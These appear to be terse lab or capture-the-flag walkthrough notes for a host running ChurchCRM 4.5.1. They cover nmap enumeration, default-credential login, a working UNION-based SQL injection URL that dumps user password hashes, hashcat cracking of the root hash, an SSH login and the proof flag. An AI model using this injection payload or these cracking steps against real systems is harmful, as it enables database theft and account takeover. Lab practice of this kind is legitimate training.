Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services:
Discovered open port 22/tcp on 192.168.245.44
Discovered open port 80/tcp on 192.168.245.44
80:
Default creds work:
Admin:changeme
ChurchCRM 4.5.1 - Authenticated SQL Injection php/webapps/51319.py
Before doing this lets see if we can just upload a php shell with our access
Could not find spot, lets try this
➜ groove python3 51319.py http://192.168.245.44 Admin changeme
did not work, but examining the exploit manually we can just utilize URL.
http://192.168.245.44/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School
Dump hashes
Admin:4bdf3fba58c956fc3991a1fde84929223f968e2853de596e49ae80a91499609b
root:33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b
This github issue:
Explains the hashes salt is the user id.
root is id 2
hashcat -m 1410 -a 0 33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b:2 /usr/share/wordlists/rockyou.txt
artistakeichelleko2007
ssh in
proof
c0f9e77a0572f4853aae5e64f6c19d51